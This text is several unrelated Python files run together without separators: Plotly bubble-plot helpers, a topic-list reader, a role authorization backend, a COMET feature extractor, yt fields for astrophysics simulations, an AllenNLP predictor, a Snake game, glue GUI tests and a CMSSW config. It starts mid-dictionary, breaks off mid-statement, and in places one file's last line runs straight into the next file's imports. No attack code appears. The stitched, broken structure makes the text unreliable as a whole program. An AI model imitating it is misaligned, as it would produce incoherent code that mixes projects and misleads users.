'quadratic-in-out'}}], 'label': 'Play', 'method': 'animate' }, { 'args': [[None], {'frame': {'duration': 0, 'redraw': False}, 'mode': 'immediate', 'transition': {'duration': 0}}], 'label': 'Pause', 'method': 'animate' } ], 'direction': 'left', 'pad': {'r': 10, 't': 87}, 'showactive': False, 'type': 'buttons', 'x': 0.1, 'xanchor': 'right', 'y': 0, 'yanchor': 'top' } ] def set_range(values, size): ''' Finds the axis range for the figure.''' rmin = int(min([return_xbin_cords(x, size) for x in values]))-size/2 rmax = int(max([return_xbin_cords(x, size) for x in values]))+size/2 return [rmin, rmax] # To be used later when individual Risk Factos can be plotted def return_xbin_cords(x_binnum, sizebin): # generate some random integers to fit in the research papers in a cell values = random.randint((-sizebin/2+5),(sizebin/2-5)) #Plots start at (0, 0) xbin_cords = sizebin/2 + (x_binnum*sizebin) + values return int(xbin_cords) # To be used later when individual Risk Factos can be plotted def return_ybin_cords(y_binnum, sizebin): # generate some random integers to fit in the research papers in a cell values = random.randint((-sizebin/2+5),sizebin/2-5) #Plots start at (0, 0) ybin_cords = sizebin/2 + (y_binnum*sizebin) + values return int(ybin_cords) # To be used later when individual Risk Factos can be plotted def return_xy_cords_nlp(a, xy, sizebin, axes, scale, shift): if axes=='x': margin = 10 # generate some random integers to fit in the research papers in a cell # remove a margin of 10 from the size of bin so effectively available size is 90 if bin is 100 values = ((xy[0]-shift)/scale)*(sizebin - 10) #Plots start at (0, 0) x_cords = sizebin/2 + (a*sizebin) + values return int(x_cords) else : # generate some random integers to fit in the research papers in a cell # remove a margin of 10 from the size of bin so effectively available size is 90 if bin is 100 values = ((xy[1]-shift)/scale)*(sizebin - 10) #Plots start at (0, 0) y_cords = sizebin/2 + (a*sizebin) + values return int(y_cords) def return_text_by_category_in_bin(grid,category,xbinnum,ybinnum,template, xcol, ycol, column, bubbletext, link, size): indicesx=[] indicesy=[] for idx, row in grid[grid['key'].str.contains(category)].iterrows(): if row['key']==template.format(xcol, category): for i, xx in enumerate(row['value']): if (xx==xbinnum): indicesx.append(i) if row['key']==template.format(ycol, category): for i, yy in enumerate(row['value']): if (yy==ybinnum): indicesy.append(i) matchindex = list(set(indicesx) & set(indicesy)) textoverall=[] textcol=[] texttext=[] textlink=[] textrelevance=[] for idx, row in grid[grid['key'].str.contains(category)].iterrows(): for i, val in enumerate(matchindex): if row['key']==template.format(column, category): textcol.append('Title:'+ str(row['value'][val])) if bubbletext: if row['key']==template.format(bubbletext, category): texttext.append('
    Summary:'+ str(row['value'][val])) if link: if row['key']==template.format(link, category): textlink.append('
    Link:'+ str(row['value'][val])) if size: if row['key']==template.format(size, category): textrelevance.append('
    Relevance:'+ str(row['value'][val])) for idx, val in enumerate(textcol): # Display top 8 of relevant and the highlighted if idx==0: textall = "" else: textall ='
    ----------------------------------------
    ' textall = textall + textcol[idx] if bubbletext: textall = textall + texttext[idx] if link: textall = textall + textlink[idx] if size: textall = textall + textrelevance[idx] textoverall.append(textall) # Plotly only able to handle only upto 9 datapoints in hovertext # TODO ensure that the closest point being hovered is always included if idx==8 : break return "".join(textoverall) # The size is used to categorize in High (top 10% percentile), Medium ( to 50% ) and Rest as Low def return_transformed_size(size, comparewith): if size > np.percentile(comparewith, 90): return size*1.25 elif size > np.percentile(comparewith, 50): return size else : return size/1.25 def get_trace(grid, col_name_template, x_column, y_column,xy_column, bubble_column, bubble_text, bubble_link,size_column=None, sizeref=1, scale_bubble=10, marker_opacity=None, marker_border_width=None, color_column=None, colorscale=None, show_colorbar=True, colorbar_title=None, mode=None, category=None, xsize=100, ysize=100, xy_scale=1, xshift=0, yshift=0): ''' Makes the trace for the data as a dictionary object that can be added to the figure or time frames.''' try: if mode =='randommode': trace = { 'x': [return_xbin_cords(x, xsize) for x in grid.loc[grid['key']==col_name_template.format(x_column, category), 'value'].values[0]], 'y': [return_ybin_cords(y, ysize) for y in grid.loc[grid['key']==col_name_template.format(y_column, category), 'value'].values[0]], 'text': [i + '
    Summary:' + j + '
    Link:' + k for i, j, k in zip(grid.loc[grid['key']==col_name_template.format(bubble_column, category), 'value'].values[0], grid.loc[grid['key']==col_name_template.format(bubble_text, category), 'value'].values[0],grid.loc[grid['key']==col_name_template.format(bubble_link, category), 'value'].values[0])], 'hovertemplate': 'Title:%{text}', 'mode': 'markers' } else: trace = { 'x': [return_xy_cords_nlp(x,xy, xsize, 'x', xy_scale, xshift) for x, xy in zip(grid.loc[grid['key']==col_name_template.format(x_column, category), 'value'].values[0],grid.loc[grid['key']==col_name_template.format(xy_column, category), 'value'].values[0])], 'y': [return_xy_cords_nlp(y,xy, ysize, 'y', xy_scale, yshift) for y, xy in zip(grid.loc[grid['key']==col_name_template.format(y_column, category), 'value'].values[0],grid.loc[grid['key']==col_name_template.format(xy_column, category), 'value'].values[0])], 'text': [return_text_by_category_in_bin(grid,category,x,y,col_name_template,x_column,y_column,bubble_column,bubble_text,bubble_link,size_column) for x, y in zip(grid.loc[grid['key']==col_name_template.format(x_column,category), 'value'].values[0],grid.loc[grid['key']==col_name_template.format(y_column, category), 'value'].values[0])], 'hovertemplate': '%{text}', 'mode': 'markers' } if size_column: trace['marker'] = { 'sizemode': 'diameter', 'sizeref': sizeref, 'size': [return_transformed_size(size, grid.loc[grid['key']==col_name_template.format(size_column, category), 'value'].values[0]) for size in grid.loc[grid['key']==col_name_template.format(size_column, category), 'value'].values[0]], } else: trace['marker'] = { 'size': 10*scale_bubble, } if marker_opacity: trace['marker']['opacity'] = marker_opacity if marker_border_width: trace['marker']['line'] = {'width': marker_border_width} if color_column: trace['marker']['color'] = grid.loc[grid['key']==col_name_template.format(color_column), 'value'].values[0] trace['marker']['colorbar'] = {'title': colorbar_title} trace['marker']['colorscale'] = colorscale if category: trace['name'] = category except: trace = { 'x': [], 'y': [], } return trace #!/usr/bin/env python f_path = "./" f_name_topics = "record_topics.txt" # Read topic_list file #------------------------# topic_list_original = [] with open( (f_path+f_name_topics),'r') as _f: for _s in _f: # Remove the space and '\n' _s1 = _s.rstrip().lstrip() # Deal with coments _idx_comment = _s1.find('#') if _idx_comment >= 0: # Do find a '#' _s1 = _s1[:_idx_comment].rstrip() # Remove the comment parts if len(_s1) > 0: # Append non-empty string (after stripping) topic_list_original.append(_s1) # # # Get unique items (remove duplicated items) and sort topic_list = sorted(set(topic_list_original)) # print(type(topic_list)) #------------------------# # Count for duplicated elements num_duplicated_topic = len(topic_list_original) - len(topic_list) if num_duplicated_topic > 0: # Let's check which topics are duplicated __unique_topic_list = list() duplicated_topic_list = list() for _tp in topic_list_original: if not _tp in __unique_topic_list: __unique_topic_list.append(_tp) else: duplicated_topic_list.append(_tp) del __unique_topic_list duplicated_topic_list = sorted(set(duplicated_topic_list)) # Print the params # print("param_dict = %s" % str(param_dict)) print("\n\ntopic_list:\n---------------" ) for _tp in topic_list: print(_tp) print("---------------\nNote: Removed %d duplicated topics." % num_duplicated_topic) if num_duplicated_topic > 0: print("\nDuplicated topics:\n---------------") for _tp in duplicated_topic_list: print(_tp) print("---------------\n\n" ) #---------------------# topic_str = " ".join(topic_list) print("---") print(topic_str) print("---") with open( (f_path+f_name_topics[:-4] + "_str.txt"),'w') as _f: _f.write(topic_str) from .base import AuthorizationBackend # A permission is defined as the role of an account. # # The optional ordering defines a relation between roles; this allows specifying e.g. "admin" as required permission # and assuming that it also has "regular" and "viewonly" permissions, without explicitly requiring them. class RoleBackend(AuthorizationBackend): def __init__(self, role_field, order=None, **kwargs): self.role_field = role_field self.order = order or [] # lower first, e.g. ["readonly", "regular", "admin"] super().__init__(**kwargs) def get_role(self, account): return getattr(account, self.role_field) def get_actual_permissions(self, account, method, path): role = self.get_role(account) actual_permissions = {role} try: index = self.order.index(role) except ValueError: index = 0 actual_permissions.update(self.order[:index]) return actual_permissions from tqdm import tqdm from nltk import tokenize import numpy as np import pickle, torch import comet.src.data.data as data import comet.src.data.config as cfg import comet.src.models.utils as model_utils import comet.src.interactive.functions as interactive class CSKFeatureExtractor(): def __init__(self): super(CSKFeatureExtractor, self).__init__() device = 0 model_file = 'comet/pretrained_models/atomic_pretrained_model.pickle' sampling_algorithm = 'beam-5' category = 'all' opt, state_dict = interactive.load_model_file(model_file) data_loader, text_encoder = interactive.load_data("atomic", opt) self.opt = opt self.data_loader = data_loader self.text_encoder = text_encoder n_ctx = data_loader.max_event + data_loader.max_effect n_vocab = len(text_encoder.encoder) + n_ctx self.model = interactive.make_model(opt, n_vocab, n_ctx, state_dict) self.model.eval() if device != 'cpu': cfg.device = int(device) cfg.do_gpu = True torch.cuda.set_device(cfg.device) self.model.cuda(cfg.device) else: cfg.device = "cpu" def set_atomic_inputs(self, input_event, category, data_loader, text_encoder): XMB = torch.zeros(1, data_loader.max_event + 1).long().to(cfg.device) prefix, suffix = data.atomic_data.do_example(text_encoder, input_event, None, True, None) if len(prefix) > data_loader.max_event + 1: prefix = prefix[:data_loader.max_event + 1] XMB[:, :len(prefix)] = torch.LongTensor(prefix) XMB[:, -1] = torch.LongTensor([text_encoder.encoder["<{}>".format(category)]]) batch = {} batch["sequences"] = XMB batch["attention_mask"] = data.atomic_data.make_attention_mask(XMB) return batch def extract(self, sentence): atomic_keys = ['xIntent', 'xAttr', 'xNeed', 'xWant', 'xEffect', 'xReact', 'oWant', 'oEffect', 'oReact'] map1 = [{}, {}, {}, {}, {}, {}, {}, {}, {}] all_keys = list(sentence.keys()) for i in tqdm(range(len(all_keys))): item = all_keys[i] list1 = [[], [], [], [], [], [], [], [], []] for x in sentence[item]: input_event = x.encode('ascii', errors='ignore').decode("utf-8") m1 = [] for sent in tokenize.sent_tokenize(input_event): seqs = [] masks = [] for category in atomic_keys: batch = self.set_atomic_inputs(sent, category, self.data_loader, self.text_encoder) seqs.append(batch['sequences']) masks.append(batch['attention_mask']) XMB = torch.cat(seqs) MMB = torch.cat(masks) XMB = model_utils.prepare_position_embeddings(self.opt, self.data_loader.vocab_encoder, XMB.unsqueeze(-1)) h, _ = self.model(XMB.unsqueeze(1), sequence_mask=MMB) last_index = MMB[0][:-1].nonzero()[-1].cpu().numpy()[0] + 1 m1.append(h[:, -1, :].detach().cpu().numpy()) m1 = np.mean(np.array(m1), axis=0) for k, l1 in enumerate(list1): l1.append(m1[k]) for k, v1 in enumerate(map1): v1[item] = list1[k] return map1 """ Nodes that perform network related functions. """ # Import the base node msg_prefix = " %| 0.00|2020-10-22T20:58:17.862886+00:00| CelerNet |[ Simulator ]|00000000-0000-0000-000000000000|" try: from .fiber_terminal import FiberTerminal print(msg_prefix + "Loaded FiberTerminal node.") except ModuleNotFoundError as e: raise e """ Module for setting up some commonly used fields for MAESTRO urca datasets with yt. """ import yt import numpy as np class PhysicalConstants: N_AVO = 6.02214129e23 class DatasetHelpers: @staticmethod def get_field(ds, field_name): field = None field_short_name = None for f in ds.field_list + ds.derived_field_list: if f[1] == field_name: field_short_name = f[1] field = f return field, field_short_name if not field: print('Field {} not present.'.format(field_name)) return None, None class UrcaShellFields(object): def __init__(self): return def setup(self, ds): # ds should be a MAESTRO dataset in yt corresponding to the urca shell variables try: ds.add_field(('boxlib','urca23_shell_unscaled'), sampling_type='cell', units='', function=UrcaShellFields._urca23_shell_unscaled) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: urca23_shell_unscaled field could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','urca23_shell'), sampling_type='cell', units='', function=UrcaShellFields._urca23_shell) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: urca23_shell field could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','weak_xrate_na23'), sampling_type='cell', units='', function=UrcaShellFields._weak_xrate_na23) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: weak_xrate_na23 field could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','weak_xrate_ne23'), sampling_type='cell', units='', function=UrcaShellFields._weak_xrate_ne23) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: weak_xrate_ne23 field could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','reduced_x23'), sampling_type='cell', units='', function=UrcaShellFields._reduced_x23) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: reduced_x23 could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','enucloss_epart_urca23'), sampling_type='cell', units='g', function=UrcaShellFields._enucloss_epart_urca23) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: enucloss_epart_urca23 could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','enucdot_dqweak_urca23'), sampling_type='cell', units='g', function=UrcaShellFields._enucdot_dqweak_urca23) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: enucdot_dqweak_urca23 could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','enucloss_sneut'), sampling_type='cell', units='g', function=UrcaShellFields._enucloss_sneut) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: enucloss_sneut could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','enucdot_ion_binding'), sampling_type='cell', units='g', function=UrcaShellFields._enucdot_ion_binding) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: enucdot_ion_binding could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','enucdot_summed_total'), sampling_type='cell', units='g', function=UrcaShellFields._enucdot_summed_total) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: enucdot_summed_total could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','enucdot_total'), sampling_type='cell', units='erg/s', function=UrcaShellFields._enucdot_total) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: enucdot_total could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','sum_omegadots'), sampling_type='cell', units='1/s', function=UrcaShellFields._sum_omegadots) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: sum_omegadots could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','sum_omegadot_urca23'), sampling_type='cell', units='1/s', function=UrcaShellFields._sum_omegadot_urca23) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: sum_omegadot_urca23 could not be added because it relies on a field not in the dataset.') pass try: ds.add_field(('boxlib','xc12_complement'), sampling_type='cell', units='', function=UrcaShellFields._xc12_complement) except yt.utilities.exceptions.YTFieldNotFound: print('WARNING: xc12_complement could not be added because it relies on a field not in the dataset.') pass @staticmethod def _urca23_shell_unscaled(field, data): return data['boxlib','ecap23']*data['boxlib','beta23']*data['boxlib','X(na23)']*data['boxlib','X(ne23)'] @staticmethod def _urca23_shell(field, data): return data['boxlib','urca23_shell_unscaled']/np.amax(data['boxlib','urca23_shell_unscaled']) @staticmethod def _weak_xrate_na23(field, data): return data['boxlib','beta23']*data['boxlib','X(ne23)'] - data['boxlib', 'X(na23)']*data['boxlib','ecap23'] @staticmethod def _weak_xrate_ne23(field, data): return data['boxlib', 'X(na23)']*data['boxlib','ecap23'] - data['boxlib','beta23']*data['boxlib','X(ne23)'] @staticmethod def _reduced_x23(field, data): return data['boxlib','X(na23)']*data['boxlib', 'X(ne23)']/(data['boxlib','X(na23)']+data['boxlib', 'X(ne23)']) @staticmethod def _enucloss_epart_urca23(field, data): return (-data['boxlib', 'epart_ecap23'] - data['boxlib', 'epart_beta23']) * data['boxlib', 'density'] * data['boxlib', 'cell_volume'] @staticmethod def _enucloss_sneut(field, data): # Energy loss rate due to plasma and other neutrino losses (not Urca) in erg/g/s * g/cm^3 * cm^3 = erg/s return data['boxlib', 'sneut'] * data['boxlib', 'density'] * data['boxlib', 'cell_volume'] @staticmethod def _enucdot_ion_binding(field, data): # Energy generation rate due to ion binding energies (does not include dQ corrections for Urca reactions) in erg/g/s * g/cm^3 * cm^3 = erg/s return data['boxlib', 'ionenuc'] * data['boxlib', 'density'] * data['boxlib', 'cell_volume'] @staticmethod def _enucdot_dqweak_urca23(field, data): return (data['boxlib', 'dqweak_ecap23'] + data['boxlib', 'dqweak_beta23']) * data['boxlib', 'density'] * data['boxlib', 'cell_volume'] @staticmethod def _enucdot_summed_total(field, data): return (data['boxlib', 'enucdot_ion_binding'] - data['boxlib', 'enucloss_sneut'] - data['boxlib', 'enucloss_epart_urca23'] + data['boxlib', 'enucdot_dqweak_urca23']) @staticmethod def _enucdot_total(field, data): return data['boxlib', 'enucdot'] * data['boxlib', 'density'] * data['boxlib', 'cell_volume'].in_units('cm**3') @staticmethod def _sum_omegadots(field, data): return np.sum(data['microphysics', 'omegadots'], axis=0) @staticmethod def _sum_omegadot_urca23(field, data): return data['boxlib', 'omegadot(ne23)'] + data['boxlib', 'omegadot(na23)'] @staticmethod def _xc12_complement(field, data): return 0.5 - data['boxlib', 'X(c12)'] """ 返回字符串中第一个不重复的字符 输入:ABCACDBEFD 输出:E """ str01="ABCACDBEFD" for i in str01: if str01.count(i)==1: print(i) break # def not_repead(str01): # for i in str01: # if str01.count(i) == 1: # return i # # res=not_repead("ABCACDBEFD") # print(res)from overrides import overrides from allennlp.common.util import JsonDict from allennlp.data import DatasetReader, Instance from allennlp.data.tokenizers import WordTokenizer from allennlp.models import Model from allennlp.service.predictors.predictor import Predictor @Predictor.register('crf-tagger') class CrfTaggerPredictor(Predictor): """ Wrapper for the :class:`~allennlp.models.crf_tagger.CrfTagger` model. """ def __init__(self, model: Model, dataset_reader: DatasetReader) -> None: super().__init__(model, dataset_reader) self._tokenizer = WordTokenizer() @overrides def _json_to_instance(self, json: JsonDict) -> Instance: """ Expects JSON that looks like ``{"sentence": "..."}`` and returns JSON that looks like ``{"tags": [...], "class_probabilities": [[...], ..., [...]]}`` """ sentence = json["sentence"] tokens = self._tokenizer.tokenize(sentence) return self._dataset_reader.text_to_instance(tokens) import random import pygame import utils class SnakeEnv: def __init__(self, snake_head_x, snake_head_y, food_x, food_y): self.game = Snake(snake_head_x, snake_head_y, food_x, food_y) self.render = False def get_actions(self): return self.game.get_actions() def reset(self): return self.game.reset() def get_points(self): return self.game.get_points() def get_environment(self): return self.game.get_environment() def step(self, action): environment, points, dead = self.game.step(action) if self.render: self.draw(environment, points, dead) return environment, points, dead def draw(self, environment, points, dead): snake_head_x, snake_head_y, snake_body, food_x, food_y = environment self.display.fill(utils.BLUE) pygame.draw.rect( self.display, utils.BLACK, [ utils.GRID_SIZE, utils.GRID_SIZE, utils.DISPLAY_SIZE - utils.GRID_SIZE * 2, utils.DISPLAY_SIZE - utils.GRID_SIZE * 2 ]) # Draw snake head pygame.draw.rect( self.display, utils.GREEN, [ snake_head_x, snake_head_y, utils.GRID_SIZE, utils.GRID_SIZE ], 3 ) # Draw snake body for seg in snake_body: pygame.draw.rect( self.display, utils.GREEN, [ seg[0], seg[1], utils.GRID_SIZE, utils.GRID_SIZE, ], 1 ) # Draw food pygame.draw.rect( self.display, utils.RED, [ food_x, food_y, utils.GRID_SIZE, utils.GRID_SIZE ] ) text_surface = self.font.render("Points: " + str(points), True, utils.BLACK) text_rect = text_surface.get_rect() text_rect.center = ((280),(25)) self.display.blit(text_surface, text_rect) pygame.display.flip() if dead: # slow clock if dead self.clock.tick(1) else: self.clock.tick(5) return def display(self): pygame.init() pygame.display.set_caption('MP4: Snake') self.clock = pygame.time.Clock() pygame.font.init() self.font = pygame.font.Font(pygame.font.get_default_font(), 15) self.display = pygame.display.set_mode((utils.DISPLAY_SIZE, utils.DISPLAY_SIZE), pygame.HWSURFACE) self.draw(self.game.get_environment(), self.game.get_points(), False) self.render = True class Snake: def __init__(self, snake_head_x, snake_head_y, food_x, food_y): self.init_snake_head_x = snake_head_x self.init_snake_head_y = snake_head_y self.init_food_x = food_x self.init_food_y = food_y # This quantity mentioned in the spec, 8*12*12 self.starve_steps = 8*(utils.DISPLAY_SIZE//utils.GRID_SIZE)**2 self.reset() def reset(self): self.points = 0 self.steps = 0 self.snake_head_x = self.init_snake_head_x self.snake_head_y = self.init_snake_head_y self.snake_body = [] self.food_x = self.init_food_x self.food_y = self.init_food_y def get_points(self): # These points only updated when food eaten return self.points def get_actions(self): # Corresponds to up, down, left, right # return [0, 1, 2, 3] return utils.UP, utils.DOWN, utils.LEFT, utils.RIGHT def get_environment(self): return [ self.snake_head_x, self.snake_head_y, self.snake_body, self.food_x, self.food_y ] def step(self, action): is_dead = self.move(action) return self.get_environment(), self.get_points(), is_dead def move(self, action): self.steps += 1 delta_x = delta_y = 0 # Up if action == utils.UP: delta_y = -1 * utils.GRID_SIZE # Down elif action == utils.DOWN: delta_y = utils.GRID_SIZE # Left elif action == utils.LEFT: delta_x = -1 * utils.GRID_SIZE # Right elif action == utils.RIGHT: delta_x = utils.GRID_SIZE old_body_head = None if len(self.snake_body) == 1: old_body_head = self.snake_body[0] # Snake "moves" by 1. adding previous head location to body, self.snake_body.append((self.snake_head_x, self.snake_head_y)) # 2. updating new head location via delta_x/y self.snake_head_x += delta_x self.snake_head_y += delta_y # 3. removing tail if body size greater than food eaten (points) if len(self.snake_body) > self.points: del(self.snake_body[0]) # Eats food, updates points, and randomly generates new food, if appropriate self.handle_eatfood() # Colliding with the snake body or going backwards while its body length # greater than 1 if len(self.snake_body) >= 1: for seg in self.snake_body: if self.snake_head_x == seg[0] and self.snake_head_y == seg[1]: return True # Moving towards body direction, not allowing snake to go backwards while # its body length is 1 if len(self.snake_body) == 1: if old_body_head == (self.snake_head_x, self.snake_head_y): return True # Check if collide with the wall (left, top, right, bottom) # Again, views grid position wrt top left corner of square if (self.snake_head_x < utils.GRID_SIZE or self.snake_head_y < utils.GRID_SIZE or self.snake_head_x + utils.GRID_SIZE > utils.DISPLAY_SIZE-utils.GRID_SIZE or self.snake_head_y + utils.GRID_SIZE > utils.DISPLAY_SIZE-utils.GRID_SIZE): return True # looping for too long and starved if self.steps > self.starve_steps: return True return False def handle_eatfood(self): if (self.snake_head_x == self.food_x) and (self.snake_head_y == self.food_y): self.random_food() self.points += 1 self.steps = 0 def random_food(self): # Math looks at upper left corner wrt DISPLAY_SIZE for grid coordinates max_x = utils.DISPLAY_SIZE - utils.WALL_SIZE - utils.GRID_SIZE max_y = utils.DISPLAY_SIZE - utils.WALL_SIZE - utils.GRID_SIZE self.food_x = random.randint(utils.WALL_SIZE, max_x) // utils.GRID_SIZE * utils.GRID_SIZE self.food_y = random.randint(utils.WALL_SIZE, max_y) // utils.GRID_SIZE * utils.GRID_SIZE # Keeps generating new food locations if it lands on the snake while self.check_food_on_snake(): self.food_x = random.randint(utils.WALL_SIZE, max_x) // utils.GRID_SIZE * utils.GRID_SIZE self.food_y = random.randint(utils.WALL_SIZE, max_y) // utils.GRID_SIZE * utils.GRID_SIZE def check_food_on_snake(self): if self.food_x == self.snake_head_x and self.food_y == self.snake_head_y: return True for seg in self.snake_body: if self.food_x == seg[0] and self.food_y == seg[1]: return True return False from __future__ import absolute_import, division, print_function import pytest from mock import MagicMock from glue.core import Data, DataCollection from glue.core.component_id import ComponentID from qtpy import QtWidgets from glue.utils.qt import combo_as_string from ..data_combo_helper import (ComponentIDComboHelper, ManualDataComboHelper, DataCollectionComboHelper) def test_component_id_combo_helper(): combo = QtWidgets.QComboBox() dc = DataCollection([]) helper = ComponentIDComboHelper(combo, dc) assert combo_as_string(combo) == "" data1 = Data(x=[1, 2, 3], y=[2, 3, 4], label='data1') dc.append(data1) helper.append_data(data1) assert combo_as_string(combo) == "x:y" data2 = Data(a=[1, 2, 3], b=['a', 'b', 'c'], label='data2') dc.append(data2) helper.append_data(data2) assert combo_as_string(combo) == "data1:x:y:data2:a:b" helper.categorical = False assert combo_as_string(combo) == "data1:x:y:data2:a" helper.numeric = False assert combo_as_string(combo) == "data1:data2" helper.categorical = True helper.numeric = True helper.visible = False assert combo_as_string(combo) == "data1:x:Pixel Axis 0 [x]:World 0:y:data2:a:Pixel Axis 0 [x]:World 0:b" helper.visible = True dc.remove(data2) assert combo_as_string(combo) == "x:y" # TODO: check that renaming a component updates the combo # data1.id['x'].label = 'z' # assert combo_as_string(combo) == "z:y" helper.remove_data(data1) assert combo_as_string(combo) == "" def test_component_id_combo_helper_nocollection(): # Make sure that we can use use ComponentIDComboHelper without any # data collection. combo = QtWidgets.QComboBox() data = Data(x=[1, 2, 3], y=[2, 3, 4], z=['a','b','c'], label='data1') helper = ComponentIDComboHelper(combo, data=data) assert combo_as_string(combo) == "x:y:z" helper.categorical = False assert combo_as_string(combo) == "x:y" helper.numeric = False assert combo_as_string(combo) == "" helper.categorical = True assert combo_as_string(combo) == "z" helper.numeric = True assert combo_as_string(combo) == "x:y:z" data2 = Data(a=[1, 2, 3], b=['a', 'b', 'c'], label='data2') with pytest.raises(Exception) as exc: helper.append_data(data2) assert exc.value.args[0] == ("Cannot change data in ComponentIDComboHelper " "initialized from a single dataset") with pytest.raises(Exception) as exc: helper.remove_data(data2) assert exc.value.args[0] == ("Cannot change data in ComponentIDComboHelper " "initialized from a single dataset") with pytest.raises(Exception) as exc: helper.set_multiple_data([data2]) assert exc.value.args[0] == ("Cannot change data in ComponentIDComboHelper " "initialized from a single dataset") def test_component_id_combo_helper_init(): # Regression test to make sure that the numeric and categorical options # in the __init__ are taken into account properly combo = QtWidgets.QComboBox() dc = DataCollection([]) data = Data(a=[1,2,3], b=['a','b','c'], label='data2') dc.append(data) helper = ComponentIDComboHelper(combo, dc) helper.append_data(data) assert combo_as_string(combo) == "a:b" helper = ComponentIDComboHelper(combo, dc, numeric=False) helper.append_data(data) assert combo_as_string(combo) == "b" helper = ComponentIDComboHelper(combo, dc, categorical=False) helper.append_data(data) assert combo_as_string(combo) == "a" helper = ComponentIDComboHelper(combo, dc, numeric=False, categorical=False) helper.append_data(data) assert combo_as_string(combo) == "" def test_component_id_combo_helper_replaced(): # Make sure that when components are replaced, the equivalent combo index # remains selected and an event is broadcast so that any attached callback # properties can be sure to pull the latest text/userData. callback = MagicMock() combo = QtWidgets.QComboBox() combo.currentIndexChanged.connect(callback) dc = DataCollection([]) helper = ComponentIDComboHelper(combo, dc) assert combo_as_string(combo) == "" data1 = Data(x=[1, 2, 3], y=[2, 3, 4], label='data1') callback.reset_mock() dc.append(data1) helper.append_data(data1) callback.assert_called_once_with(0) callback.reset_mock() assert combo_as_string(combo) == "x:y" new_id = ComponentID(label='new') data1.update_id(data1.id['x'], new_id) callback.assert_called_once_with(0) callback.reset_mock() assert combo_as_string(combo) == "new:y" def test_manual_data_combo_helper(): combo = QtWidgets.QComboBox() dc = DataCollection([]) helper = ManualDataComboHelper(combo, dc) data1 = Data(x=[1,2,3], y=[2,3,4], label='data1') dc.append(data1) assert combo_as_string(combo) == "" helper.append_data(data1) assert combo_as_string(combo) == "data1" data1.label = 'mydata1' assert combo_as_string(combo) == "mydata1" dc.remove(data1) assert combo_as_string(combo) == "" def test_data_collection_combo_helper(): combo = QtWidgets.QComboBox() dc = DataCollection([]) helper = DataCollectionComboHelper(combo, dc) data1 = Data(x=[1,2,3], y=[2,3,4], label='data1') dc.append(data1) assert combo_as_string(combo) == "data1" data1.label = 'mydata1' assert combo_as_string(combo) == "mydata1" dc.remove(data1) assert combo_as_string(combo) == "" ckamtsikis/cmssw import FWCore.ParameterSet.Config as cms import FWCore.ParameterSet.VarParsing as VarParsing process = cms.Process("OccupancyPlotsTest") #prepare options options = VarParsing.VarParsing("analysis") options.register ('globalTag', "DONOTEXIST", VarParsing.VarParsing.multiplicity.singleton, # singleton or list VarParsing.VarParsing.varType.string, # string, int, or float "GlobalTag") options.register ('HLTprocess', "HLT", VarParsing.VarParsing.multiplicity.singleton, # singleton or list VarParsing.VarParsing.varType.string, # string, int, or float "HLTProcess") options.register ('triggerPath', "HLT_*", VarParsing.VarParsing.multiplicity.singleton, # singleton or list VarParsing.VarParsing.varType.string, # string, int, or float "list of HLT paths") options.parseArguments() # process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True), fileMode = cms.untracked.string("FULLMERGE") ) process.load("FWCore.MessageService.MessageLogger_cfi") process.MessageLogger.cout.enable = True process.MessageLogger.cout.threshold = cms.untracked.string("INFO") process.MessageLogger.debugModules = cms.untracked.vstring("*") process.MessageLogger.cout.default = cms.untracked.PSet( limit = cms.untracked.int32(0) ) process.MessageLogger.files = dict( detids = cms.untracked.PSet( default = cms.untracked.PSet( limit = cms.untracked.int32(0) ), BuildingTrackerDetId = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ), GeometricDetBuilding = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ), SubDetectorGeometricDetType = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ), BuildingGeomDetUnits = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ), LookingForFirstStrip = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ), BuildingSubDetTypeMap = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ), SubDetTypeMapContent = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ), NumberOfLayers = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ), IsThereTest = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ), threshold = cms.untracked.string("DEBUG") ) ) process.MessageLogger.cout.DuplicateHitFinder = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ) process.MessageLogger.cout.FwkSummary = cms.untracked.PSet( limit = cms.untracked.int32(100000000) ) process.MessageLogger.cout.FwkReport = cms.untracked.PSet( reportEvery = cms.untracked.int32(10000) ) process.MessageLogger.cerr.threshold = cms.untracked.string("WARNING") process.MessageLogger.cerr.default = cms.untracked.PSet( limit = cms.untracked.int32(10000000) ) process.MessageLogger.cerr.FwkReport = cms.untracked.PSet( reportEvery = cms.untracked.int32(100000) ) #------------------------------------------------------------------ process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(options.maxEvents) ) process.source = cms.Source("PoolSource", fileNames = 